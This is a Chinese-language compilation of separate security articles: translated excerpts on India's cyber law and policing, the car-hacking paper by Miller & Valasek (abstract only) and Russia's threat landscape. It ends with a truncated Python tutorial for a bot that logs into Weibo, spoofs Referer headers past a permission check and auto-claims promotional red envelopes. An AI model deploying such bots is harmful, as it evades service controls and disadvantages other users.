通常来说，由于可用资源的质量问题，警察和国家安全资源处理网络犯罪和网络安全时是难以达到，防御或者保密的。尽管从新闻中获取一些零碎信息是可能的，但是从电视、报纸和网络获取的信息要保留意见。

作为殖民地规则的遗物，印度的法律体系是从英国的体系中衍生而得的。有很多的国际法律学校和私人机构教授法律和法律相关的课程，然而，在2009年8月16日，印度有着全世界积压最多的案件。根据官方统计，2009年八月全国低级别的法院积压了约两千六百四十万件案件，而高等级法院积压了月三百八十万件案件。最高法院2009年7月有超过五万件积压的案件。有些推迟可能是因为高级法院的法官空缺，而在低级法院，这一空缺可能达到了20%到25%（约3000个空岗）。

4.13、法律环境

在印度，下述几个政府机构负责网络犯罪调查，网络安全调查和网络恐怖主义调查：

• 印度国家犯罪统计局（NCRB）

• 印度中央调查局（CBI）

• 网络警察组

中央调查局在2000年设置了“网络犯罪研究和发展单位”（CCRDU）和网络犯罪调查小组（CCIC）来收集国家不同部门的网络犯罪信息。设置这些机构是为了调查网络犯罪，保持网络安全，并实现IT法案和印度刑法涉及到的网络犯罪条款。国家犯罪统计局提供了像CCIS&警用软件、网络&电子安全思想、计算机中心管理等训练课程。这些政府机构与IT公司、律师和教育工作者合作带给印度最新的网络世界并监管网络犯罪。

印度CERT在调查和保护印度网络方面起到了重要作用，它致力于提供一个切入点来报道当地的问题，帮助普通的计算机团体预防和处理计算机安全事件，通过分享CERTs的信息和课程，以及引导追踪事件。其在解决安全知道方面有着很大的前瞻性，并在网络入侵方面成为了国家的知识储备库和参考机构。

IT法案2000是印度对于网络领域电子商务管理和保护的第一次尝试。然而，一些印度政治家批评这一立法是无效的并暗示了对罪犯的软弱。根据一个专家团队的建议，在2003年1月6日发布了针对IT法的重要的修正案。

但是，这一修正案并没有将该法令的主要漏洞进行有效的修补。随后，IT修正案提案在2008年产生，并于2009年1月5日通过总统审核。然而，政治家坚持批判这一修正案是对罪犯的软弱。

鉴于IT法的一些关于网络钓鱼和垃圾邮件的定义存在漏洞，德里高级法院在Tata Sons Ltd. V. Amit Kumar的案件中，通过了一项关于限制印度的主要通信服务商VSNL散发大量未经允许的邮件的决议。由于缺乏关于反垃圾邮件的法案，法庭只能借用入侵法案来控告这一罪行。

IT法在抑制网络恐怖主义方面也是无效的，孟买网络小组只办理了屈指可数的案例。

IT法还有一项没有解决的问题就是网络犯罪的权限。因此，警察经常在追踪网络犯罪时无法跟踪电子轨迹。IT法和其修正案在处理网络犯罪和其相关问题时有很多无效的条款，对于印度的个人和商业互动也没有能提供一个安全的环境。

在印度的少数几个邦如马哈拉施特拉、 喀拉拉邦、 卡纳塔克、 泰米尔纳德邦、 昌迪加尔、 北方邦和德里有当地警察设立的网络犯罪小组。报告的最多的犯罪是黑客行为、散布色情邮件、扭曲社交网站、发送淫秽短信和邮件、来自非洲国家的网络欺骗和网络追踪等。孟买网络小组是最活跃的一个，他协助谷歌封锁了在Orkut上包含“诽谤或煽动性内容”的论坛和社区，并且提供了制造上述内容地的IP地址。在喀拉拉邦的高科技犯罪调查小组（HTCEC）与eBay和Orkut合作来检查网络辱骂行为。该小组还关注恐怖主义相关的在线活动。该小组一次独立行动成功的逮捕了一名在昌迪加尔发布欺诈邮件的尼日利亚人。

网络犯罪小组中这些成功的案例是非常少的。这仅仅是刚开始，由于对网络犯罪意识的缺乏和相关法律规定的确实，他们还缺少对于正在猖狂发展的网络犯罪有效的遏制能力，

大多数网络犯罪小组都对其警官提供了一些法律和实际上的训练。德里的网络犯罪小组与德里的IP大学合作建立训练项目，该项目已经对超过100名警官进行了网络犯罪相关的训练并将他们分配到警察局的经济犯罪部门。同时，在加济阿巴德的CBI的训练研究院为网络犯罪小组警官提供训练，而只有研究院的成员才能知道训练项目详细具体的保密信息。

政府成立的旨在帮助其成员减少计算机安全威胁的CERT-In组织同样提供训练他们为网络犯罪小组的警察提供了专门的法律训练。CERT-In同样为法院的检察官提供了专门的关于计算机调查取证方面的训练，该训练的详细信息同样是保密的。

IT法说明了计算机病毒攻击未经允许的计算机或计算机网络造成的损害最多赔偿一千万卢比（216000美元）。该法案只是提供了民事补偿而不考虑刑事责任。IT法第43和66条规定了软件盗版是一种罪行，根据第43条规定最多惩罚一千万卢比（216000美元），而根据第66条规定最多可能导致三年监禁和最多二十万卢比（4300美元）。印度的司法部门也采取坚定的立场反对软件盗版。德里高级法院在微软公司对康普顿电脑的盗版软件贩卖案件中裁定了记录中最高的236万2000卢比（51000美元）罚款。印度大多数邦都建立了反盗版小组以预防和控制大规模的软件盗版问题。

然而，印度还没有关于电子邮件隐私和电子监控活动的法律。这就取决于公司是否制定了相关的规定和处罚机制。根据公司的政策，大多数公司与员工都会签订保密协议。

2000IT法规定了与数据保护相关的条例。2006年，立法委员会引进了“个人数据保护法案”以保护个人信息的安全。IT法第43条规定未授权入侵计算机系统最多可处罚一千万卢比（216000美元）。对未授权数据的下载、提取和拷贝也有这样的处罚。条款c规定了未授权的计算机病毒植入处罚，条款g规定了辅助未授权入侵行为的处罚。

第72条对违反保密协议和侵犯数据隐私行为提供了保护。在IT法和联盟规定中，任何人通过安全渠道将电子记录、书籍、账户、通信、其他信息文档泄露给其他人的，最高可处以2年监禁或十万卢比（2100美元）或两者都有。

如今大多数公司依靠合同法作为有效保护他们信息的方法，并与其他公司、客户、机构和合作伙伴签署“非规避和保密”协议、“用户许可”协议、“推荐合作伙伴”协议等来保障保密和隐私问题，并在发生争执作为有效的仲裁办法。

印度没有规定保护公司数据安全的法律，所以大多数公司都有他们自己的数据保护政策，并与其客户和员工签署协议来保护他们的数据安全。

4.14、审查和政府干预

尽管印度政府很少过滤互联网内容，但是在2010年后，尤其是在孟买恐怖袭击之后，其监控通讯的能力一定得到了扩张。在接下来的一年中，按照2008IT法修正案，政府将建立一个集中的监管系统，届时印度警察和政府机构将很快得到使用新的监控系统的使用权限。至于审查制度的问题，印度宪法表明了言论自由，但是由于诸如“公共秩序、礼仪或道德”等原因，仍然存在一个“合理限制”的灰色地带。潜在的限制范围是非常广的，但是实际上过滤的互联网内容主要集中在政府认为威胁到国家安全方面的，例如存在分裂主义或恐怖主义内容的论坛。执行这些限制的目标主要集中在过滤政府认为可能引起暴乱或社会动荡的内容上。

按照认定的互联网内容过滤流程，由电信管理局（TRAI）和政府其他机构来认定不正当的内容或用户，由电信部（DOT）要求ISPs按照条例规定封锁相关内容或某个用户。此外，CERT-In有权关闭政府认为隐晦或者存在国家安全威胁的网站。尽管CERT-In、DOT和TRAI在哪些内容应该被禁止方面起决定作用，但是他们大都依赖于ISP而不是内容的作者来实施禁止的命令。政府依赖于ISP执行官方的禁止命令，然而众多ISP对于政府要求过滤的响应也不尽相同。因此，网络内容很可能可以通过某一ISP而被另一个所禁止，而且鉴于ISP的封锁机制和等级的不同，合法的内容也可能被按照审核机制过滤掉。然而，未来政府依靠ISP去执行过滤政策的现象会逐渐减少。在2007年，DOT宣布他们考虑在印度的网络关口执行内容过滤行为，尽管这个计划在两年前就已经提出，但是经开放网络促进会测试表明DOT还没有实施这一措施并且还在依靠ISP过滤内容。

尽管网络内容过滤大部分依旧是在ISP级别进行的，但是印度政府也在号召各个互联网公司消灭那些政府认为有潜在的引起公众恐慌和动乱的不良网络内容。例如，自从谷歌在印度运营以来，已经配合政府拿下了很多例不良的影响国家安全的内容。尽管商业激励措施可以促使很多国外的公司配合政府执行内容过滤要求，但还是要有法律规定才行。最近的一项刑法修正案规定不配合官方屏蔽或删除违规内容的人可能面临罚款甚至最高7年的监禁。同时，政府由于国家安全目的执行的网络过滤措施对于合法的网络内容造成了负面影响。在2003年，印度政府要求当地ISP封锁雅虎的一个关于Hynniewtrep民族解放委员会（国内一个小型的分裂组织）的讨论组。尽管政府是要求封锁单独的一个极端分子讨论组，但是ISP无法封锁一个单独的小组。所以他们封锁了这个小组涉及的IP地址，妨碍了几乎所有印度的雅虎小组访问途径。在2006年孟买恐怖袭击事件之后，还发生了一个类似的事件。政府要求封锁大概20个极端网站，但是ISP封锁了进入著名博客网站Blogspot的渠道。

印度政府为了监控和情报活动，在接下来一年计划推出全新的强有力的集中监控系统（CSM）用来随时监听手机、固定线路和网络通讯。政府现在的监控和情报系统在锁定目标的几个过程中都需要认为的干预，这妨碍了情报收集的效率并使得系统容易受到攻击。印度官方希望通过部署CMS系统解决这一问题，并声称将在2010年进行测试的新系统将极大的提高情报部门锁定和监控的过程。

由于印度的情报部门升级了其监控措施，国家的监控能力将在颁布2008IT法修正案后得到扩展。撰写本报告时，相关法令的建立正处于最后一个阶段，并很可能将在2010年生效。立法者和警察期望IT法将通过更方便的授权等方式促进他们在进行调查和情报收集时更加的便利。这包括要求ISP、电信运营商和其他服务提供商提供用户个人信息的权利。此外，法令还要求ISP、电信商和银行等拥有第三方数据的的公司接受合理的安全演习，如果他们拒绝接受则可能面临大量的罚款。然而，法令没有规定服务提供商对在他们的网络上进行的违规内容或恶意活动进行响应，但是要求他们在收到当局的要求后两小时内进行封锁或删除。

五、结论

印度曾经是世界上主要的新兴经济体，而现在在很多方面也处于经济发展当中，它并没有很完善的安全保护措施和特点，这些可能在其他发展中国家也能看到。最重要的安全措施和特点可能包括了长期过载以至于案件往往在开庭前就超期几年更不用说结案的印度法律体制。尽管这首先可以看作是一个抽象的长远的问题，但这是外国公司在印度运营的潜在的重要决定因素，与其是否外包，是否运营公司等其他因素无关。网络安全问题，比如内部威胁、数据盗窃、信用卡盗用或网络间谍行为，可能导致上文提到的复杂的花费几年都无法结案的案件。对于任何打算要在印度运作的公司，必须尽职的进行调查并对可能出现的问题有全面的认识。像银行这样的单位绝对需要保证其在印度的敏感信息保持安全，因此，全天候现场人与人的监督和管理是必不可缺的。

（全文完）

原文：《Adventures in Automotive Networks and Control Units》 By Dr.Charlie Miller & Chris Valasek

翻译：孙希栋 & 做个好人

*原文共101页，译文亦长达124页，故本文仅贴出摘要及第一章，文末附原报告及译稿文档下载。由于译者水平有限，译文或有翻译不当之处，欢迎各位指正。

摘要

我们之前的研究表明，攻击者可以通过诸如蓝牙接口和车载信息系统单元等各种接口在汽车的电子控制单元（ECU）中进行远程代码执行。这篇报告旨在展开描述基于这种攻击思路和攻击类型的攻击者能够对汽车行为造成什么样的影响。特别是，我们将展示通过两台汽车在某些情况下怎样控制汽车转向、制动、油门和电子显示。我们也对这些类型的攻击检测提供了建议。在这篇报告中我们发布了所有用来重现和理解相关问题需要的技术信息，包括源代码和必要的硬件描述。

一、简介

汽车早已不仅仅是机械设备，今天的汽车所包含的许多不同的电子组件构成的一个整体网络负责监视和控制交通工具的状态，从防抱死制动模块到指令集群再到车载信息系统模块，每一个组件都能够和相邻的组件进行通讯。现代汽车总共包含至少50个以上网络化电子控制单元（ECUs），交通工具的整体安全即依赖于这些几近于实时通讯的各种不同的ECU，在它们相互之间进行通讯时，ECU负责预警撞车、检测刹车、完成防抱死制动等等。

当电子化网络组件被添加到任何设备，这些设备上代码运行的鲁棒性和可靠性问题便会随之增加。当考虑到人身安全问题，结合汽车的环境，代码可靠性就显得尤为重要和关切。在典型的计算环境中，例如一台笔记本电脑，很容易写一些脚本或应用程序监视和调整电脑运行的方式。然而，在高度计算机化的汽车中，没有一种简单的方式可以写应用程序去胜任监视或控制不同嵌入式系统的任务。驾驶员和乘客完全是得幸于在他们汽车上所运行的代码，不像当他们的网页浏览器崩溃或受感染，汽车对于他们的人身安全的威胁是实实在在的。

一些学术派的研究员，尤其是来自华盛顿大学和加州圣地亚哥大学[http://www.autosec.org/publications.html]的研究显示，在汽车一些组件中驻留代码进行控制诸如电子显示、车门锁和汽车制动等关键系统是有可能的。此外，他们的研究还显示，攻击者可以通过物理接触甚至通过远程蓝牙或者车载信息系统单元进行恶意代码注入。他们所展示的不仅有电子化汽车系统意外失败的真实威胁，甚至还有恶意代码行为影响汽车系统安全性的威胁。但是他们没有发布任何代码或工具，事实上，他们连自己所研究的汽车模块都没有透露。

除了讨论新型的攻击，这篇报告的目的还在于用公开、透明的方式为安全研究人员提供汽车系统的访问能力。当前，没有一种简易的方式可以写自定制软件对现代汽车的ECU进行监视和交互。攻击的风险是切实存在的，但是对于研究人员来说没有一种方式对汽车系统进行监视和交互真是令人沮丧。这篇报告正是提供了一种针对汽车系统且允许进行这类工具构成的框架，而且能够在两种现代汽车上进行演示，该框架能够让研究人员用具体的方式展示针对汽车系统的威胁，并且能够写出监视和控制程序用来减轻这种威胁。

我们所说的框架结构是针对后续提到的两款汽车的，也是这次研究的关键。我们所讨论的应用是基于带有停车辅助和其他技术附件的丰田普锐斯（Prius）和福特翼虎（Escape）（均是2010款）。与早期研究不同，这些技术附加产品能够让我们的框架不仅能访问制动和显示层面的系统，而且还能访问转向系统。我们选择了两台汽车达到我们通用研究的目的，同时也尽可能的说明不同汽车的不同之处。希望我们使用的所有数据和工具的发布能够让其他研究人员对研究结果进行轻易地重现（和详细描述）。

原稿全文下载：《Adventures in Automotive Networks and Control Units》

译稿全文下载：《汽车网络和控制单元的安全威胁研究》

（全文完）

原文：《The Cyber Threat Landscape of the Russian Federation》（2010年7月21日）

翻译：lgt945

*译文长达近三万字，故本文仅贴出前两章，应iDefense要求，我们不再提供原版报告下载。由于译者水平有限，译文或有翻译不当之处，欢迎各位指正。

一、摘要

与中国和美国不同，俄罗斯（见图1-1）是世界上发生恶意网络活动和网络犯罪行为最多的国家，而这主要是由于其IT产业爆炸式的增长以及一定程度上俄罗斯政府的主导导致的。基本上每种经济网络犯罪和政治网络攻击都会在俄罗斯发生，本报告对这两种行为进行了详细的描述。

俄罗斯的地理条件、社会经济环境、杂乱的历史和严厉的政策等因素使得这里产生了一个了网络犯罪的平台。优秀的教育环境使得俄罗斯大量有高科技思想的人工作在远低于他们能力的位置上。犯罪文化的流行和人情变得冷漠，甚至年轻的俄罗斯政府的腐败，都导致许多人进入了这个很容易从西方公司和私人个体获取名声和金钱的地下犯罪环境中来。

图1-1：俄罗斯地图

在约束网络犯罪方面，俄罗斯的政府领导几乎起不到帮助作用。一直到最近，由于俄罗斯本土的受害者并不多，而且有限的资源迫使官方主要将注意力集中在了反恐方面，使得关心网络犯罪的群体异常稀少。这一情形随着俄罗斯公民受到的网络攻击逐渐增长而开始缓慢的改变。贪污腐败也是一大问题，而且还受到上述资源的限制。私人企业，尤其是大型的网络服务提供商（ISP），开始合作应对网络犯罪问题，但是前路还很漫长。

由于其自身产出一些期刊文献，以及部分文化习俗的原因，俄罗斯网络犯罪地下组织处于一个非常复杂的地位。“俄罗斯”黑客已然成为了一种刻板印象，但这些印象中，也存在着一些共通点。俄罗斯内务部网络犯罪部门（K部门“Department K”）的中将Boris Miroshnikov在发表关于称赞俄罗斯黑客的内容时说道，“世界上最好的黑客在俄罗斯”，这也反映出俄罗斯的确有很多天才的黑客存在。此外，与其他国家和地区相比，俄罗斯黑客受到法律制裁的压力更小。因此，西方公司想要在俄罗斯正常的运营就必须要能够在各种无情的网络威胁之下确保自身安全。

二、网络威胁模型

图2-1显示了对俄罗斯所有主要的网络威胁一个近似的评估，依照每种威胁发生的可能性和潜在的影响进行排列。尽管对于某些类型进行公平可靠的统计是可行的，但是并不一定对其他类型也同样适用。因此，部分网络威胁类型的评估是不精确的，而是借鉴了其他多重的可靠数据、独立事件信息和iDefense的实地研究得来的。

图2-1: 俄罗斯网络安全威胁模型；Y轴表示发生的可能性，X轴表示重要性既可能影响的范围

• 网络钓鱼——俄罗斯是全世界钓鱼攻击的主要发源地，而其国内诸如网上银行和其他金融交易服务（如电子货币）等方面也正在受到越来越多的网络钓鱼关注。
• 贪污腐败——贪污腐败，尤其是政府的官僚主义现象在俄罗斯非常普遍。从网络安全角度来看，罪犯的确可能通过贿赂官员来得到法律保护，但是这要视情况而定，尤其是在高风险的时候往往无法达成。
• 信用卡犯罪——俄罗斯进行信用卡欺诈犯罪的人非常活跃，并且目标分布在全世界范围。在国内，信用卡犯罪时有发生但并不是主要的问题。
• ATM犯罪——在俄罗斯，由于城市外的ATM的增加以及一些机构使用预付费的信用卡来分发工资的原因，窃取信用卡信息的行为日益增加。此外，在俄罗斯，罪犯还能很轻易的直接从ATM获取到信用卡。
• 僵尸网络感染-俄罗斯是僵尸网络的核心区域，尽管国际上的受害者要超过俄罗斯本土，但是其国内的受感染者正在增长。
• 数据偷窃——商业间谍和竞争公司之间的数据偷窃行为属于中等风险。
• 恶意代码——俄罗斯是全世界恶意代码的主要发源地区，和其他种类的网络犯罪相比，国内的恶意代码比率相对较少但是也正在逐渐增长之中。
• 内部威胁——俄罗斯的内部威胁风险属于中-高级别，主要风险集中在新进员工身上。
• 盗版——个人用户使用盗版软件和多媒体内容是很普遍的，而政府和企业使用非法软件的频率相对较少。
• 黑客行为-在俄罗斯，在线的个人和政治动机的攻击是非常普遍的，主要的典型行为表现在分布式拒绝服务攻击上（DDoS）。
• DDoS攻击——俄罗斯是DDoS攻击的核心区域，国内的攻击频率远超针对欧美和国际上的攻击行为。
• 服务中断和数据丢失——主要城市的基础服务设施是相对比较可靠的，部分组织有非常小的可能会因为俄罗斯政府急于扩张对于互联网的控制权而无意中被置为非可信区从而被迫暂停服务。
• 网络间谍——如果一个组织持有重量级的信息或技术，那么他有可能被那些俄罗斯政府支持的个人或机构盯上。俄罗斯政府和前苏联的敌对商业机构也很可能参与到间谍行为中来，甚至有一定可能参与到网络攻击中去。    
• 网络恐怖主义——从技术角度来看，网络恐怖主义对于俄罗斯政府来说不是威胁。然而，高加索（俄罗斯南部地区）穆斯林极端恐怖分子开始尝试在线的攻击行动，并表示有意愿去提高他们的攻击能力。

原稿全文下载：《The Cyber Threat Landscape of the Russian Federation》

译稿全文下载：《俄罗斯网络威胁概览》

（全文完）

0x00背景

大家好，我是来自IDF实验室的@无所不能的魂大人！

红包纷纷何所似？兄子胡儿曰：“撒钱空中差可拟。”兄女道韫曰：“未若姨妈因风起。”

背景大家都懂的，要过年了，正是红包满天飞的日子。正巧前两天学会了Python，比较亢奋，就顺便研究了研究微博红包的爬取，为什么是微博红包而不是支付宝红包呢，因为我只懂Web，如果有精力的话之后可能也会研究研究打地鼠算法吧。

因为本人是初学Python，这个程序也是学了Python后写的第三个程序，所以代码中有啥坑爹的地方请不要当面戳穿，重点是思路，嗯，如果思路中有啥坑爹的的地方也请不要当面戳穿，你看IE都有脸设置自己为默认浏览器，我写篇渣文得瑟得瑟也是可以接受的对吧……

我用的是Python 2.7，据说Python 2和Python 3差别挺大的，比我还菜的小伙伴请注意。

0x01 思路整理

懒得文字叙述了，画了张草图，大家应该可以看懂。

首先老规矩，先引入一坨不知道有啥用但又不能没有的库：

import re
import urllib
import urllib2
import cookielib
import base64 
import binascii 
import os
import json
import sys 
import cPickle as p
import rsa

然后顺便声明一些其它变量，以后需要用到：

reload(sys)
sys.setdefaultencoding('utf-8') #将字符编码置为utf-8
luckyList=[] #红包列表
lowest=10 #能忍受红包领奖记录最低为多少

这里用到了一个rsa库，Python默认是不自带的，需要安装一下：https://pypi.python.org/pypi/rsa/

下载下来后运行setpy.py install安装，然后就可以开始我们的开发步骤了。

0x02 微博登陆

抢红包的动作一定要登陆后才可以进行的，所以一定要有登录的功能，登录不是关键，关键是cookie的保存，这里需要cookielib的配合。

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)

这样凡是使用opener进行的网络操作都会对处理cookie的状态，虽然我也不太懂但是感觉好神奇的样子。

接下来需要封装两个模块，一个是获取数据模块，用来单纯地GET数据，另一个用来POST数据，其实只是多了几个参数，完全可以合并成一个函数，但是我又懒又笨，不想也不会改代码。

def getData(url) :
        try:
                req  = urllib2.Request(url)
                result = opener.open(req)
                text = result.read()
                text=text.decode("utf-8").encode("gbk",'ignore')
                return text
        except Exception, e:
                print u'请求异常,url:'+url
                print e

def postData(url,data,header) :
        try:
                data = urllib.urlencode(data)  
                req  = urllib2.Request(url,data,header)
                result = opener.open(req)
                text = result.read()
                return text
        except Exception, e:
                print u'请求异常,url:'+url

有了这两个模块我们就可以GET和POST数据了，其中getData中之所以decode然后又encode啥啥的，是因为在Win7下我调试输出的时候总乱码，所以加了些编码处理，这些都不是重点，下面的login函数才是微博登陆的核心。

def login(nick , pwd) :
        print u"----------登录中----------"
        print  "----------......----------"
        prelogin_url = 'http://login.sina.com.cn/sso/prelogin.php?entry=weibo&callback=sinaSSOController.preloginCallBack&su=%s&rsakt=mod&checkpin=1&client=ssologin.js(v1.4.15)&_=1400822309846' % nick
        preLogin = getData(prelogin_url)
        servertime = re.findall('"servertime":(.+?),' , preLogin)[0]
        pubkey = re.findall('"pubkey":"(.+?)",' , preLogin)[0]
        rsakv = re.findall('"rsakv":"(.+?)",' , preLogin)[0]
        nonce = re.findall('"nonce":"(.+?)",' , preLogin)[0]
        #print bytearray('xxxx','utf-8')
        su  = base64.b64encode(urllib.quote(nick))
        rsaPublickey= int(pubkey,16)
        key = rsa.PublicKey(rsaPublickey,65537)
        message = str(servertime) +'\t' + str(nonce) + '\n' + str(pwd)
        sp = binascii.b2a_hex(rsa.encrypt(message,key))
        header = {'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'}
        param = {
                'entry': 'weibo',
                'gateway': '1',
                'from': '',
                'savestate': '7',
                'userticket': '1',
                'ssosimplelogin': '1',
                'vsnf': '1',
                'vsnval': '',
                'su': su,
                'service': 'miniblog',
                'servertime': servertime,
                'nonce': nonce,
                'pwencode': 'rsa2',
                'sp': sp,
                'encoding': 'UTF-8',
                'url': 'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack',
                'returntype': 'META',
                'rsakv' : rsakv,
                }
        s = postData('http://login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.15)',param,header)

        try:
                urll = re.findall("location.replace\(\'(.+?)\'\);" , s)[0]
                login=getData(urll)
                print u"---------登录成功！-------"
                print  "----------......----------"
        except Exception, e:
                print u"---------登录失败！-------"
                print  "----------......----------"
                exit(0)

这里面的参数啊加密算法啊都是从网上抄的，我也不是很懂，大概就是先请求个时间戳和公钥再rsa加密一下最后处理处理提交到新浪登陆接口，从新浪登录成功之后会返回一个微博的地址，需要请求一下，才能让登录状态彻底生效，登录成功后，后面的请求就会带上当前用户的cookie。

0x03 指定红包抽取

成功登录微博后，我已迫不及待地想找个红包先试一下子，当然首先是要在浏览器里试的。点啊点啊点啊点的，终于找到了一个带抢红包按钮的页面了，F12召唤出调试器，看看数据包是咋请求的。

可以看到请求的地址是http://huodong.weibo.com/aj_hongbao/getlucky，主要参数有两个，一个是ouid，就是红包id，在URL中可以看到，另一个share参数决定是否分享到微博，还有个_t不知道是干啥用的。

好，现在理论上向这个url提交者三个参数，就可以完成一次红包的抽取，但是，当你真正提交参数的时候，就会发现服务器会很神奇地给你返回这么个串：

{"code":303403,"msg":"抱歉，你没有权限访问此页面","data":[]}

这个时候不要惊慌，根据我多年Web开发经验，对方的程序员应该是判断referer了，很简单，把请求过去的header全给抄过去。

def getLucky(id): #抽奖程序
        print u"---抽红包中："+str(id)+"---"
        print  "----------......----------"

        if checkValue(id)==False: #不符合条件，这个是后面的函数
                return
        luckyUrl="http://huodong.weibo.com/aj_hongbao/getlucky"
        param={
                'ouid':id,
                'share':0,
                '_t':0
                }

        header= {
                'Cache-Control':'no-cache',
                'Content-Type':'application/x-www-form-urlencoded',
                'Origin':'http://huodong.weibo.com',
                'Pragma':'no-cache',
                'Referer':'http://huodong.weibo.com/hongbao/'+str(id),
                'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 BIDUBrowser/6.x Safari/537.36',
                'X-Requested-With':'XMLHttpRequest'
                }
        res = postData(luckyUrl,param,header)

这样的话理论上就没啥问题了，事实上其实也没啥问题。抽奖动作完成后我们是需要判断状态的，返回的res是一个json串，其中code为100000时为成功，为90114时是今天抽奖达到上限，其他值同样是失败，所以：

hbRes=json.loads(res)
if hbRes["code"]=='901114': #今天红包已经抢完
        print u"---------已达上限---------"
        print  "----------......----------"
        log('lucky',str(id)+'---'+str(hbRes["code"])+'---'+hbRes["data"]["title"])
        exit(0)
elif hbRes["code"]=='100000':#成功
        print u"---------恭喜发财---------"
        print  "----------......----------"
        log('success',str(id)+'---'+res)
        exit(0)

if hbRes["data"] and hbRes["data"]["title"]:
        print hbRes["data"]["title"]
        print  "----------......----------"
        log('lucky',str(id)+'---'+str(hbRes["code"])+'---'+hbRes["data"]["title"])
else:
        print u"---------请求错误---------"
        print  "----------......----------"
        log('lucky',str(id)+'---'+res)

其中log也是我自定义的一个函数，用来记录日志用的：

def log(type,text):
        fp = open(type+'.txt','a')
        fp.write(text)
        fp.write('\r\n')
        fp.close()

0x04 爬取红包列表

单个红包领取动作测试成功后，就是我们程序的核心大招模块了——爬取红包列表，爬取红包列表的方法和入口应该有不少，比如各种微博搜索关键字啥啥的，不过我这里用最简单的方法：爬取红包榜单。

在红包活动的首页(http://huodong.weibo.com/hongbao)通过各种点更多，全部可以观察到，虽然列表连接很多，但可以归纳为两类（最有钱红包榜除外）：主题和排行榜。

继续召唤F12，分析这两种页面的格式，首先是主题形式的列表，比如：http://huodong.weibo.com/hongbao/special_quyu

可以看到红包的信息都是在一个类名为info_wrap的div中，那么我们只要活动这个页面的源码，然后把infowrap全抓出来，再简单处理下就可以得到这个页面的红包列表了，这里需要用到一些正则：

def getThemeList(url,p):#主题红包
        print  u"---------第"+str(p)+"页---------"
        print  "----------......----------"
        html=getData(url+'?p='+str(p))
        pWrap=re.compile(r'<div class="info_wrap">(.+?)<span class="rob_txt"></span>',re.DOTALL) #h获取所有info_wrap的正则
        pInfo=re.compile(r'.+<em class="num">(.+)</em>.+<em class="num">(.+)</em>.+<em class="num">(.+)</em>.+href="(.+)" class="btn"',re.DOTALL) #获取红包信息
        List=pWrap.findall(html,re.DOTALL)
        n=len(List)
        if n==0:
                return
        for i in range(n): #遍历所有info_wrap的div
                s=pInfo.match(List[i]) #取得红包信息
                info=list(s.groups(0))
                info[0]=float(info[0].replace('\xcd\xf2','0000')) #现金,万->0000
                try:
                        info[1]=float(info[1].replace('\xcd\xf2','0000')) #礼品价值
                except Exception, e:
                        info[1]=float(info[1].replace('\xd2\xda','00000000')) #礼品价值
                info[2]=float(info[2].replace('\xcd\xf2','0000')) #已发送
                if info[2]==0:
                        info[2]=1 #防止除数为0
                if info[1]==0:
                        info[1]=1 #防止除数为0
                info.append(info[0]/(info[2]+info[1])) #红包价值,现金/（领取人数+奖品价值）
                # if info[0]/(info[2]+info[1])>100:
                #  print url
                luckyList.append(info)
        if 'class="page"' in html:#存在下一页
                p=p+1
                getThemeList(url,p) #递归调用自己爬取下一页

话说正则好难，学了好久才写出来这么两句。还有这里的info中append进去了一个info[4]，是我想的一个大概判断红包价值的算法，为什么要这么做呢，因为红包很多但是我们只能抽四次啊，在茫茫包海中，我们必须要找到最有价值的红包然后抽丫的，这里有三个数据可供参考：现金价值、礼品价值和领取人数，很显然如果现金很少领取人数很多或者奖品价值超高（有的甚至丧心病狂以亿为单位），那么就是不值得去抢的，所以我憋了半天终于憋出来一个衡量红包权重的算法：红包价值=现金/（领取人数+奖品价值）。

排行榜页面原理一样，找到关键的标签，正则匹配出来。

def getTopList(url,daily,p):#排行榜红包
        print  u"---------第"+str(p)+"页---------"
        print  "----------......----------"
        html=getData(url+'?daily='+str(daily)+'&p='+str(p))
        pWrap=re.compile(r'<div class="list_info">(.+?)<span class="list_btn"></span>',re.DOTALL) #h获取所有list_info的正则
        pInfo=re.compile(r'.+<em class="num">(.+)</em>.+<em class="num">(.+)</em>.+<em class="num">(.+)</em>.+href="(.+)" class="btn rob_btn"',re.DOTALL) #获取红包信息
        List=pWrap.findall(html,re.DOTALL)
        n=len(List)
        if n==0:
                return
        for i in range(n): #遍历所有info_wrap的div
                s=pInfo.match(List[i]) #取得红包信息
                topinfo=list(s.groups(0))
                info=list(topinfo)
                info[0]=topinfo[1].replace('\xd4\xaa','') #元->''
                info[0]=float(info[0].replace('\xcd\xf2','0000')) #现金,万->0000
                info[1]=topinfo[2].replace('\xd4\xaa','') #元->''
                try:
                        info[1]=float(info[1].replace('\xcd\xf2','0000')) #礼品价值
                except Exception, e:
                        info[1]=float(info[1].replace('\xd2\xda','00000000')) #礼品价值
                info[2]=topinfo[0].replace('\xb8\xf6','') #个->''
                info[2]=float(info[2].replace('\xcd\xf2','0000')) #已发送
                if info[2]==0:
                        info[2]=1 #防止除数为0
                if info[1]==0:
                        info[1]=1 #防止除数为0
                info.append(info[0]/(info[2]+info[1])) #红包价值,现金/（领取人数+礼品价值）
                # if info[0]/(info[2]+info[1])>100:
                        #  print url
                luckyList.append(info)
        if 'class="page"' in html:#存在下一页
                p=p+1
                getTopList(url,daily,p) #递归调用自己爬取下一页

好，现在两中专题页的列表我们都可以顺利爬取了，接下来就是要得到列表的列表，也就是所有这些列表地址的集合，然后挨个去抓：

def getList():
        print u"---------查找目标---------"
        print  "----------......----------"

        themeUrl={ #主题列表
                'theme':'http://huodong.weibo.com/hongbao/theme',
                'pinpai':'http://huodong.weibo.com/hongbao/special_pinpai',
                'daka':'http://huodong.weibo.com/hongbao/special_daka',
                'youxuan':'http://huodong.weibo.com/hongbao/special_youxuan',
                'qiye':'http://huodong.weibo.com/hongbao/special_qiye',
                'quyu':'http://huodong.weibo.com/hongbao/special_quyu',
                'meiti':'http://huodong.weibo.com/hongbao/special_meiti',
                'hezuo':'http://huodong.weibo.com/hongbao/special_hezuo'
                }

        topUrl={ #排行榜列表
                'mostmoney':'http://huodong.weibo.com/hongbao/top_mostmoney',
                'mostsend':'http://huodong.weibo.com/hongbao/top_mostsend',
